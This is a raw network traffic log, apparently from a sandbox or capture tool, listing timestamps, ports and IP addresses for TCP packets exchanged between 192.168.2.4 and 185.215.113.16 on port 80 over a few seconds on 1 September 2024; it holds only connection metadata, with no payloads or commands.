Sep 1, 2024 20:09:48.285132885 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.285145044 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.285175085 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.285200119 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.332760096 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.332825899 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.332844019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.332854033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.332890034 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.332968950 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.333009005 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.372891903 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.372962952 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.373102903 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.373147011 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.481267929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.481293917 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.481304884 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.481451988 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.481451988 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.523407936 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.523456097 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.523461103 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.523478985 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.523503065 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.523520947 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.523659945 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.523700953 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.683181047 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.683238029 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.683248997 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.683260918 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.683291912 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.718871117 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.718950033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.718961000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.718996048 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.719079971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.719094992 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.719120979 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.719214916 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.767524004 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.767576933 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.767627954 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.767692089 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.885344028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.885559082 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:48.885811090 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:48.885860920 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:49.011641979 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:49.011650085 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:49.011837959 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:49.503622055 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:49.503649950 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:49.503720045 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.113337994 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.113351107 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.113550901 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.471415997 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.471460104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.471471071 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.471554041 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.471600056 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.471628904 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.471736908 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.512428999 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.512468100 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.512478113 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.512602091 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.512612104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.512626886 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.512626886 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.512648106 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.512778044 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.512789965 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.512892962 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.512893915 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.512893915 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.512918949 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.512969971 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.729785919 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.729798079 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.729808092 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.729888916 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.729902029 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.729912996 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.729962111 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.814111948 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.814188957 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.814205885 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.814268112 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.908394098 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.908416033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.908427000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.908438921 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.908447981 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.908484936 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.908518076 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:50.908844948 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:50.908891916 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.109183073 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.109195948 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.109208107 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.109349966 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.109349966 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.109771967 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.109812975 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.109821081 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.109848976 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.109951019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.109961987 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.109975100 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.109989882 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.110002041 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.110019922 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.110142946 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.110153913 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.110182047 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.110194921 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.310885906 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.310925961 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.310978889 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.311002016 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.313200951 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.313251972 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.313283920 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.313294888 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.313318014 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.313338995 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.313395977 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.313409090 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.313437939 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.313456059 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.313643932 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.313657999 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.313684940 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.313700914 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.519984961 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.520015955 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.520028114 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.520054102 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.520081997 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.528244972 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.528294086 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.528381109 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.528393030 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.528433084 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.528443098 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.529095888 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.529155970 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.604341984 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.604352951 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.604392052 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.604413986 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.718867064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.718911886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.718921900 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.719000101 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.719062090 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.719062090 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.719062090 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.724055052 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.724107027 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.724150896 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.724162102 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.724199057 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.724375010 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.724385977 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.724395990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.724425077 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.724437952 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.908888102 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.908970118 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.908982038 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.909050941 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.909050941 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.909050941 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.916747093 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.916829109 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.916831970 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.916840076 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.916870117 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.916883945 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.917022943 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.917035103 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.917045116 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.917056084 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.917071104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:51.917073011 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:51.917123079 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.102375984 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.102426052 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.102437019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.102550983 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.112409115 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.112421036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.112430096 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.112457037 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.112488031 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.112505913 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.112585068 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.112615108 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.112632990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.112682104 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.112696886 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.186887026 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.186934948 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.187087059 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.187133074 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.536061049 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.536273956 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.536276102 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.536341906 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.543337107 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.543349028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.543359041 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.543443918 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.543560028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.543570995 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.543581009 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.543593884 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.543605089 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.543606997 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.543652058 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.544009924 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.544059038 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.544071913 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.544083118 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.544116020 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.635643959 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.635725975 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.635756969 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.635890007 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.717628956 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.717683077 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.717705965 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.717716932 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.717752934 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.755959988 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.756023884 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.756027937 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.756040096 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.756067038 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.756078959 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.842314005 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.842386961 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.842467070 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.842467070 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.882462025 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.882530928 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.882555962 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.882567883 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.882601976 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.882626057 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.926605940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.926678896 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.926846027 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.926888943 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.941534996 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.941595078 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.941606045 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:52.941627026 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:52.941651106 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.274338961 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.274353027 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.274363995 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.274389982 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.274411917 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.332957983 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.333003044 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.333014011 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.333048105 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.333076000 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.333275080 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.333286047 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.333297014 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.333308935 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.333321095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.333322048 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.333340883 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.333369970 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.359523058 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.359599113 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.473381042 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.473496914 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.473506927 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.473527908 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.473532915 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.473628044 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.558772087 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.558835983 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.559041977 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.559041977 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.643542051 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.643661976 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.643663883 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.643815994 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.682601929 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.682693958 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.682707071 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.682744026 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.682786942 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.682786942 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.682786942 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.682786942 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.791980982 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.792032003 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.792053938 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.792071104 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.792110920 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.875969887 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.876033068 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.876069069 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.876080990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.876116037 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.876832962 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.876878023 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:53.993083954 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.993096113 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:53.993161917 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.077378988 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.077462912 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.077482939 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.077517986 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.385251999 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.385309935 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.385348082 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.385366917 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.470189095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.470199108 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.470237970 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:54.582953930 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:54.583007097 CEST	80	49738	185.215.113.16	192.168.2.4
